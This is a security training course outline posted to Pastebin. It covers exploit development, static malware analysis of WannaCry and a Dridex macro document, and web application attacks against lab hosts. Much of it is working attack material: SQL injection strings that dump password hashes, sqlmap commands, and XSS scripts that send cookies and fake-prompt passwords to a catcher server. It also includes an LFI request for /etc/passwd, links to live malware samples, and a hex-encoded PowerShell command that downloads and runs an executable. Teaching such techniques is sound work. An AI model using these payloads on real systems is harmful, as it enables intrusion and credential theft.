joemccray

Advanced attack and defense

Sep 17th, 2018
1,615
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 110.88 KB | None | 0 0
  1. #######################################
  2. ----------- ############### # Day 1: Intro to Exploit Development ################ -----------
  3. #######################################
  4.  
  5.  
  6. Step 1: Host Discovery - what's alive
  7. - Ping Sweep
  8. nmap -sP <IP-Range>
  9.  
  10. Step 2: Service Discovery - what's where
  11.  
  12. - Port Scan
  13. nmap -sS <IP-Range>
  14.  
  15. Step 3: Service Version Determination
  16. - Bannergrab
  17. nmap -sV <IP-Range>
  18.  
  19. Step 4: Vulnerability Research
  20. - Search exploit website
  21. http://exploit-db.com/search
  22.  
  23. -------------------------------------------------
  24. 1. App Type
  25. - Stand Alone
  26. - Client Server (***vulnserver.exe***)
  27. - Web App
  28.  
  29. 2. Input Type
  30. - Stand Alone File/Keyboard/Mouse
  31. - Client Server Logical network port (***9999***)
  32. - Web App Browser
  33.  
  34.  
  35. 3. Map and fuzz app entry points
  36. - Commands, Methods, Verbs, functions, controllers, subroutines
  37. TRUN 2100
  38.  
  39. 4. Isolate the crash
  40. EIP = 39 6F 43 38
  41. 9 o C 8
  42.  
  43. 5. Calculate distance to EIP
  44. 2006
  45.  
  46. 6. Redirect code execution to mem location you control
  47.  
  48. 7. Insert payload (shellcode)
  49. --------------------------------------------------------------
  50.  
  51. #########################################
  52. # FreeFloat FTP Server Exploit Analysis #
  53. #########################################
  54.  
  55.  
  56.  
  57. Analyze the following exploit code:
  58. https://www.exploit-db.com/exploits/15689/
  59.  
  60. 1. What is the target platform that this exploit works against?
  61. 2. What is the variable name for the distance to EIP?
  62. 3. What is the actual distance to EIP in bytes?
  63. 4. Describe what is happening in the variable ‘junk2’
  64.  
  65.  
  66.  
  67.  
  68. Analysis of the training walk-through based on EID: 15689:
  69. http://45.63.104.73/ff.zip
  70.  
  71.  
  72.  
  73.  
  74. ff1.py
  75. 1. What does the sys module do? Call System Commands
  76. 2. What is sys.argv[1] and sys.argv[2]?
  77. 3. What application entry point is being attacked in this script?
  78.  
  79.  
  80.  
  81. ff2.py
  82. 1. Explain what is happening in lines 18 - 20 doing.
  83. 2. What pattern_create.rb doing and where can I find it?
  84. 3. Why can’t I just double click the file to run this script?
  85.  
  86.  
  87.  
  88. ff3.py
  89. 1. Explain what is happening in lines 17 - to 25?
  90. 2. Explain what is happening in lines 30 - to 32?
  91. 3. Why is everything below line 35 commented out?
  92.  
  93.  
  94.  
  95. ff4.py
  96. 1. Explain what is happening in lines 13 - to 15.
  97. 2. Explain what is happening in line 19.
  98. 3. Why is everything below line 35 commented out?
  99.  
  100.  
  101.  
  102. Ff5.py
  103. 1. Explain what is happening in line 15.
  104. 2. What is struct.pack?
  105. 3. How big is the shellcode in this script?
  106.  
  107.  
  108.  
  109. ff6.py
  110. 1. What is the distance to EIP?
  111. 2. How big is the shellcode in this script?
  112. 3. What is the total byte length of the data being sent to this app?
  113.  
  114.  
  115.  
  116.  
  117. ff7.py
  118. 1. What is a tuple in python?
  119. 2. How big is the shellcode in this script?
  120. 3. Did your app crash in from this script?
  121.  
  122.  
  123.  
  124.  
  125. ff8.py
  126. 1. How big is the shellcode in this script?
  127. 2. What is try/except in python?
  128. 3. What is socket.SOCK_STREAM in Python?
  129.  
  130.  
  131.  
  132. ff9.py
  133. 1. What is going on in lines 19 and 20?
  134. 2. What is the length of the NOPs?
  135. 3. What is socket.SOCK_STREAM in Python?
  136.  
  137.  
  138.  
  139.  
  140. ff010.py
  141. 1. What is going on in lines 18 - 20?
  142. 2. What is going on in lines 29 - 32?
  143. 3. How would a stack adjustment help this script?
  144.  
  145.  
  146.  
  147.  
  148.  
  149. #######################################
  150. ----------- ################ Day 2: Intro to Defensive Cyber Ops ################ -----------
  151. #######################################
  152.  
  153. ################
  154. # The Scenario #
  155. ################
  156. You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
  157.  
  158.  
  159. The fastest thing you can do is perform static analysis.
  160.  
  161.  
  162.  
  163. ###################
  164. # Static Analysis #
  165. ###################
  166.  
  167. - After logging please open a terminal window and type the following commands:
  168.  
  169.  
  170. ---------------------------Type This-----------------------------------
  171. cd ~
  172.  
  173. mkdir malware_analysis
  174.  
  175. cd malware_analysis
  176.  
  177. wget http://45.63.104.73/wannacry.zip
  178.  
  179. unzip wannacry.zip
  180. infected
  181.  
  182. file wannacry.exe
  183.  
  184. mv wannacry.exe malware.pdf
  185.  
  186. file malware.pdf
  187.  
  188. mv malware.pdf wannacry.exe
  189.  
  190. hexdump -n 2 -C wannacry.exe
  191.  
  192. ----------------------------------------------------------------------
  193.  
  194.  
  195. ***What is '4d 5a' or 'MZ'***
  196. Reference:
  197. http://www.garykessler.net/library/file_sigs.html
  198.  
  199.  
  200.  
  201.  
  202. ---------------------------Type This-----------------------------------
  203. objdump -x wannacry.exe
  204.  
  205. strings wannacry.exe
  206.  
  207. strings --all wannacry.exe | head -n 6
  208.  
  209. strings wannacry.exe | grep -i dll
  210.  
  211. strings wannacry.exe | grep -i library
  212.  
  213. strings wannacry.exe | grep -i reg
  214.  
  215. strings wannacry.exe | grep -i key
  216.  
  217. strings wannacry.exe | grep -i rsa
  218.  
  219. strings wannacry.exe | grep -i open
  220.  
  221. strings wannacry.exe | grep -i get
  222.  
  223. strings wannacry.exe | grep -i mutex
  224.  
  225. strings wannacry.exe | grep -i irc
  226.  
  227. strings wannacry.exe | grep -i join
  228.  
  229. strings wannacry.exe | grep -i admin
  230.  
  231. strings wannacry.exe | grep -i list
  232.  
  233. ----------------------------------------------------------------------
  234.  
  235.  
  236.  
  237.  
  238.  
  239. Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
  240.  
  241. Quick Google search for "wannacry ransomeware analysis"
  242.  
  243.  
  244. Reference
  245. https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
  246.  
  247. - Yara Rule -
  248.  
  249.  
  250. Strings:
  251. $s1 = “Ooops, your files have been encrypted!” wide ascii nocase
  252. $s2 = “Wanna Decryptor” wide ascii nocase
  253. $s3 = “.wcry” wide ascii nocase
  254. $s4 = “WANNACRY” wide ascii nocase
  255. $s5 = “WANACRY!” wide ascii nocase
  256. $s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase
  257.  
  258.  
  259.  
  260.  
  261.  
  262.  
  263.  
  264.  
  265. Ok, let's look for the individual strings
  266.  
  267.  
  268. ---------------------------Type This-----------------------------------
  269. strings wannacry.exe | grep -i ooops
  270.  
  271. strings wannacry.exe | grep -i wanna
  272.  
  273. strings wannacry.exe | grep -i wcry
  274.  
  275. strings wannacry.exe | grep -i wannacry
  276.  
  277. strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
  278. ----------------------------------------------------------------------
  279.  
  280.  
  281.  
  282.  
  283.  
  284.  
  285. ####################################
  286. # Tired of GREP - let's try Python #
  287. ####################################
  288. Decided to make my own script for this kind of stuff in the future. I
  289.  
  290. Reference1:
  291. http://45.63.104.73/analyse_malware.py
  292.  
  293. This is a really good script for the basics of static analysis
  294.  
  295. Reference:
  296. https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
  297.  
  298.  
  299. This is really good for showing some good signatures to add to the Python script
  300.  
  301.  
  302. Here is my own script using the signatures (started this yesterday, but still needs work):
  303. https://pastebin.com/guxzCBmP
  304.  
  305.  
  306.  
  307. ---------------------------Type This-----------------------------------
  308. sudo apt install -y python-pefile
  309. strategicsec
  310.  
  311.  
  312. wget https://pastebin.com/raw/guxzCBmP
  313.  
  314.  
  315. mv guxzCBmP am.py
  316.  
  317.  
  318. cat am.py | less
  319. q
  320.  
  321. python am.py wannacry.exe
  322. ----------------------------------------------------------------------
  323.  
  324. #####################################################
  325. # Analyzing Macro Embedded Malware #
  326. # Reference: #
  327. # https://jon.glass/analyzes-dridex-malware-p1/ #
  328. #####################################################
  329. ---------------------------Type This-----------------------------------
  330. cd ~/malware_analysis
  331.  
  332. sudo pip install olefile
  333. strategicsec
  334.  
  335. wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
  336.  
  337. unzip oledump_V0_0_22.zip
  338.  
  339. wget http://45.63.104.73/064016.zip
  340.  
  341. unzip 064016.zip
  342. infected
  343.  
  344. python oledump.py 064016.doc
  345.  
  346. python oledump.py 064016.doc -s A4 -v
  347. -----------------------------------------------------------------------
  348.  
  349.  
  350.  
  351. - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
  352. - Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
  353.  
  354. ---------------------------Type This-----------------------------------
  355. python oledump.py 064016.doc -s A5 -v
  356. -----------------------------------------------------------------------
  357.  
  358. - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
  359.  
  360. ---------------------------Type This-----------------------------------
  361. python oledump.py 064016.doc -s A3 -v
  362.  
  363. - Look for "GVhkjbjv" and you should see:
  364.  
  365. 636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
  366.  
  367. - Take that long blob that starts with 636D and finishes with 653B and paste it in:
  368. http://www.rapidtables.com/convert/number/hex-to-ascii.htm
  369.  
  370. #######################################
  371. ##################################
  372. # Basic: Web Application Testing #
  373. ##################################
  374.  
  375. Most people are going to tell you reference the OWASP Testing guide.
  376. https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
  377.  
  378. I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
  379.  
  380.  
  381. The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
  382.  
  383. 1. Does the website talk to a DB?
  384. - Look for parameter passing (ex: site.com/page.php?id=4)
  385. - If yes - try SQL Injection
  386.  
  387. 2. Can I or someone else see what I type?
  388. - If yes - try XSS
  389.  
  390. 3. Does the page reference a file?
  391. - If yes - try LFI/RFI
  392.  
  393. Let's start with some manual testing against 45.77.162.239
  394.  
  395.  
  396. Start here:
  397. ---------------------------Paste this into Firefox-----------------------------------
  398. http://45.77.162.239/
  399. -----------------------------------------------------------------------
  400.  
  401. Let's try throwing a single quote (') in there:
  402. ---------------------------Paste this into Firefox-----------------------------------
  403. http://45.77.162.239/bookdetail.aspx?id=2'
  404. -------------------------------------------------------------------------------------
  405.  
  406. I get the following error:
  407.  
  408. Unclosed quotation mark after the character string ''.
  409. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
  410.  
  411. Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.
  412.  
  413.  
  414.  
  415.  
  416.  
  417.  
  418.  
  419.  
  420.  
  421.  
  422. #########################################################################################
  423. # SQL Injection #
  424. # http://45.63.104.73/1-Intro_To_SQL_Intection.pptx #
  425. #########################################################################################
  426.  
  427.  
  428. - Another quick way to test for SQLI is to remove the parameter value
  429.  
  430.  
  431. #############################
  432. # Error-Based SQL Injection #
  433. #############################
  434. ---------------------------Paste these one line at a time into Firefox-----------------------------------
  435. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
  436. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
  437. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
  438. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
  439. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
  440. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
  441. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
  442. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
  443. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
  444. ---------------------------------------------------------------------------------------------------------
  445.  
  446.  
  447.  
  448.  
  449.  
  450. #############################
  451. # Union-Based SQL Injection #
  452. #############################
  453. ---------------------------Paste these one line at a time into Firefox-----------------------------------
  454. http://45.77.162.239/bookdetail.aspx?id=2 order by 100--
  455. http://45.77.162.239/bookdetail.aspx?id=2 order by 50--
  456. http://45.77.162.239/bookdetail.aspx?id=2 order by 25--
  457. http://45.77.162.239/bookdetail.aspx?id=2 order by 10--
  458. http://45.77.162.239/bookdetail.aspx?id=2 order by 5--
  459. http://45.77.162.239/bookdetail.aspx?id=2 order by 6--
  460. http://45.77.162.239/bookdetail.aspx?id=2 order by 7--
  461. http://45.77.162.239/bookdetail.aspx?id=2 order by 8--
  462. http://45.77.162.239/bookdetail.aspx?id=2 order by 9--
  463. http://45.77.162.239/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
  464. ---------------------------------------------------------------------------------------------------------
  465.  
  466. We are using a union select statement because we are joining the developer's query with one of our own.
  467. Reference:
  468. http://www.techonthenet.com/sql/union.php
  469. The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
  470. It removes duplicate rows between the various SELECT statements.
  471.  
  472. Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
  473. ---------------------------Paste these one line at a time into Firefox-----------------------------------
  474. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
  475. ---------------------------------------------------------------------------------------------------------
  476. Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
  477.  
  478. ---------------------------Paste these one line at a time into Firefox-----------------------------------
  479. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
  480. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
  481. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
  482. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
  483. ---------------------------------------------------------------------------------------------------------
  484.  
  485.  
  486.  
  487.  
  488. - Another way is to see if you can get the backend to perform an arithmetic function
  489. ---------------------------Paste these one line at a time into Firefox-----------------------------------
  490. http://45.77.162.239/bookdetail.aspx?id=(2)
  491. http://45.77.162.239/bookdetail.aspx?id=(4-2)
  492. http://45.77.162.239/bookdetail.aspx?id=(4-1)
  493. ---------------------------------------------------------------------------------------------------------
  494.  
  495. - This is some true/false logic testing
  496. ---------------------------Paste this into Firefox-----------------------------------
  497. http://45.77.162.239/bookdetail.aspx?id=2 or 1=1--
  498. http://45.77.162.239/bookdetail.aspx?id=2 or 1=2--
  499. http://45.77.162.239/bookdetail.aspx?id=1*1
  500. http://45.77.162.239/bookdetail.aspx?id=2 or 1 >-1#
  501. http://45.77.162.239/bookdetail.aspx?id=2 or 1<99#
  502. http://45.77.162.239/bookdetail.aspx?id=2 or 1<>1#
  503. http://45.77.162.239/bookdetail.aspx?id=2 or 2 != 3--
  504. http://45.77.162.239/bookdetail.aspx?id=2 &0#
  505. -------------------------------------------------------------------------------------
  506.  
  507. -- Now that we've seen the differences in the webpage with True/False SQL Injection - let's see what we can learn using it
  508. ---------------------------Paste this into Firefox-----------------------------------
  509. http://45.77.162.239/bookdetail.aspx?id=2 and 1=1--
  510. http://45.77.162.239/bookdetail.aspx?id=2 and 1=2--
  511. http://45.77.162.239/bookdetail.aspx?id=2 and user='joe' and 1=1--
  512. http://45.77.162.239/bookdetail.aspx?id=2 and user='dbo' and 1=1--
  513. ---------------------------------------------------------------------------------------
  514.  
  515.  
  516. ###############################
  517. # Blind SQL Injection Testing #
  518. ###############################
  519. Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
  520.  
  521. 3 - Total Characters
  522. ---------------------------Paste these one line at a time into Firefox-----------------------------------
  523. http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
  524. http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
  525. http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
  526. ---------------------------------------------------------------------------------------------------------
  527.  
  528. Let's go for a quick check to see if it's DBO
  529. ---------------------------Paste this into Firefox-----------------------------------
  530. http://45.77.162.239/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
  531. -------------------------------------------------------------------------------------
  532. Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
  533.  
  534. D - 1st Character
  535. ---------------------------Paste these one line at a time into Firefox-----------------------------------
  536. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
  537. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
  538. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
  539. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
  540. ---------------------------------------------------------------------------------------------------------
  541.  
  542. B - 2nd Character
  543. ---------------------------Paste these one line at a time into Firefox-----------------------------------
  544. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  545. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  546. ---------------------------------------------------------------------------------------------------------
  547.  
  548. O - 3rd Character
  549. ---------------------------Paste these one line at a time into Firefox-----------------------------------
  550. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  551. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
  552. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  553. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  554. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
  555. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
  556. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  557. ---------------------------------------------------------------------------------------------------------
  558.  
  559.  
  560.  
  561.  
  562. ##########
  563. # Sqlmap #
  564. ##########
  565. If you want to see how we automate all of the SQL Injection attacks you can log into your StrategicSec-Ubuntu-VM and run the following commands:
  566. ---------------------------Type This-----------------------------------
  567. cd ~/toolz/sqlmap-dev/
  568. python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -b
  569. python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" --current-user
  570. python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" --current-db
  571. python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" --dbs
  572. python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp --tables
  573. python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns
  574. python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns
  575. python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns --dump
  576. python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns --dump
  577. python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" --users --passwords
  578. ------------------------------------------------------------------------
  579.  
  580.  
  581.  
  582. #######################
  583. # Attacking PHP/MySQL #
  584. #######################
  585.  
  586. Go to LAMP Target homepage
  587. ---------------------------Paste this into Firefox-----------------------------------
  588. http://45.63.104.73/
  589. -------------------------------------------------------------------------------------
  590.  
  591.  
  592. Clicking on the Acer Link:
  593. ---------------------------Paste this into Firefox-----------------------------------
  594. http://45.63.104.73/acre2.php?lap=acer
  595. -------------------------------------------------------------------------------------
  596.  
  597. - Found parameter passing (answer yes to question 1)
  598. - Insert ' to test for SQLI
  599.  
  600. ---------------------------Paste this into Firefox-----------------------------------
  601. http://45.63.104.73/acre2.php?lap=acer'
  602. -------------------------------------------------------------------------------------
  603.  
  604. Page returns the following error:
  605. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''acer''' at line 1
  606.  
  607.  
  608.  
  609. In order to perform union-based sql injection - we must first determine the number of columns in this query.
  610. We do this using the ORDER BY
  611. ---------------------------Paste this into Firefox-----------------------------------
  612. http://45.63.104.73/acre2.php?lap=acer' order by 100-- +
  613. -------------------------------------------------------------------------------------
  614.  
  615.  
  616. Page returns the following error:
  617. Unknown column '100' in 'order clause'
  618.  
  619.  
  620. ---------------------------Paste this into Firefox-----------------------------------
  621. http://45.63.104.73/acre2.php?lap=acer' order by 50-- +
  622. -------------------------------------------------------------------------------------
  623.  
  624.  
  625. Page returns the following error:
  626. Unknown column '50' in 'order clause'
  627.  
  628.  
  629. ---------------------------Paste this into Firefox-----------------------------------
  630. http://45.63.104.73/acre2.php?lap=acer' order by 25-- +
  631. -------------------------------------------------------------------------------------
  632.  
  633. Page returns the following error:
  634. Unknown column '25' in 'order clause'
  635.  
  636.  
  637. ---------------------------Paste this into Firefox-----------------------------------
  638. http://45.63.104.73/acre2.php?lap=acer' order by 12-- +
  639. -------------------------------------------------------------------------------------
  640.  
  641. Page returns the following error:
  642. Unknown column '12' in 'order clause'
  643.  
  644.  
  645. ---------------------------Paste this into Firefox-----------------------------------
  646. http://45.63.104.73/acre2.php?lap=acer' order by 6-- +
  647. -------------------------------------------------------------------------------------
  648. ---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
  649.  
  650.  
  651.  
  652. Now we build out the union all select statement with the correct number of columns
  653.  
  654. Reference:
  655. http://www.techonthenet.com/sql/union.php
  656.  
  657.  
  658. ---------------------------Paste this into Firefox-----------------------------------
  659. http://45.63.104.73/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
  660. -------------------------------------------------------------------------------------
  661.  
  662.  
  663.  
  664. Now we negate the parameter value 'acer' by turning into the word 'null':
  665.  
  666. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
  667. -------------------------------------------------------------------------------------
  668.  
  669. We see that a 4 and a 5 are on the screen. These are the columns that will echo back data
  670.  
  671.  
  672. Use a cheat sheet for syntax:
  673. http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
  674.  
  675. ---------------------------Paste these one line at a time into Firefox-----------------------------------
  676. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
  677.  
  678. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j
  679.  
  680. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +
  681.  
  682. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +
  683.  
  684. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a
  685. ------------------------------------------------------------------------------------- -------------------
  686.  
  687.  
  688.  
  689.  
  690. Sometimes students ask about the "-- j" or "-- +" that I append to SQL injection attack string.
  691.  
  692. Here is a good reference for it:
  693. https://www.symantec.com/connect/blogs/mysql-injection-comments-comments
  694.  
  695. Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by a terminating single quote appended by the web application. However, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.
  696.  
  697.  
  698.  
  699. ###############################################################################
  700. # What is XSS #
  701. # http://45.63.104.73/2-Intro_To_XSS.pptx #
  702. ###############################################################################
  703.  
  704. OK - what is Cross Site Scripting (XSS)
  705.  
  706. 1. Use Firefox to browse to the following location:
  707. ---------------------------Paste this into Firefox-----------------------------------
  708. http://45.63.104.73/xss_practice/
  709. -------------------------------------------------------------------------------------
  710.  
  711. A really simple search page that is vulnerable should come up.
  712.  
  713.  
  714.  
  715.  
  716. 2. In the search box type:
  717. ---------------------------Paste this into Firefox-----------------------------------
  718. <script>alert('So this is XSS')</script>
  719. -------------------------------------------------------------------------------------
  720.  
  721.  
  722. This should pop-up an alert window with your message in it proving XSS is in fact possible.
  723. Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
  724.  
  725.  
  726. 3. In the search box type:
  727. ---------------------------Paste this into Firefox-----------------------------------
  728. <script>alert(document.cookie)</script>
  729. -------------------------------------------------------------------------------------
  730.  
  731.  
  732. This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
  733. Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
  734.  
  735. 4. Now replace that alert script with:
  736. ---------------------------Paste this into Firefox-----------------------------------
  737. <script>document.location="http://45.63.104.73/xss_practice/cookie_catcher.php?c="+document.cookie</script>
  738. -------------------------------------------------------------------------------------
  739.  
  740. This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
  741.  
  742.  
  743. 5. Now view the stolen cookie at:
  744. ---------------------------Paste this into Firefox-----------------------------------
  745. http://45.63.104.73/xss_practice/cookie_stealer_logs.html
  746. -------------------------------------------------------------------------------------
  747.  
  748. The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
  749.  
  750.  
  751.  
  752.  
  753.  
  754.  
  755. ############################
  756. # A Better Way To Demo XSS #
  757. ############################
  758.  
  759.  
  760. Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
  761.  
  762.  
  763. Use Firefox to browse to the following location:
  764. ---------------------------Paste this into Firefox-----------------------------------
  765. http://45.63.104.73/xss_practice/
  766. -------------------------------------------------------------------------------------
  767.  
  768.  
  769. Paste this in the search box
  770. ----------------------------
  771.  
  772.  
  773. Option 1
  774. --------
  775. ---------------------------Paste this into Firefox-----------------------------------
  776. <script>
  777. password=prompt('Your session is expired. Please enter your password to continue',' ');
  778. document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
  779. </script>
  780. -------------------------------------------------------------------------------------
  781.  
  782. Now view the stolen cookie at:
  783. ---------------------------Paste this into Firefox-----------------------------------
  784. http://45.63.104.73/xss_practice/passwords.html
  785. -------------------------------------------------------------------------------------
  786.  
  787.  
  788. Option 2
  789. --------
  790. -------------------------Paste this into Firefox-----------------------------------
  791. <script>
  792. username=prompt('Please enter your username',' ');
  793. password=prompt('Please enter your password',' ');
  794. document.write("<img src=\"http://45.63.104.73/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
  795. </script>
  796. -------------------------------------------------------------------------------------
  797.  
  798.  
  799.  
  800. Now view the stolen cookie at:
  801. http://45.63.104.73/xss_practice/username_password_logs.html
  802.  
  803.  
  804.  
  805.  
  806. #########################################
  807. # Let's try a local file include (LFI) #
  808. #########################################
  809. - Here is an example of an LFI
  810. - Open this page in Firefox:
  811. -------------------------Paste this into Firefox-----------------------------------
  812. http://45.63.104.73/showfile.php?filename=contactus.txt
  813. -------------------------------------------------------------------------------------
  814.  
  815.  
  816. - Notice the page name (showfile.php) and the parameter name (filename) and the filename (contactus.txt)
  817. - Here you see a direct reference to a file on the local filesystem of the victim machine.
  818. - You can attack this by doing the following:
  819. -------------------------Paste this into Firefox-----------------------------------
  820. http://45.63.104.73/showfile.php?filename=/etc/passwd
  821. -------------------------------------------------------------------------------------
  822.  
  823.  
  824. - This is an example of a Local File Include (LFI), to change this attack into a Remote File Include (RFI) you need some content from
  825. - somewhere else on the Internet. Here is an example of a text file on the web:
  826. -------------------------Paste this into Firefox-----------------------------------
  827. http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
  828. -------------------------------------------------------------------------------------
  829.  
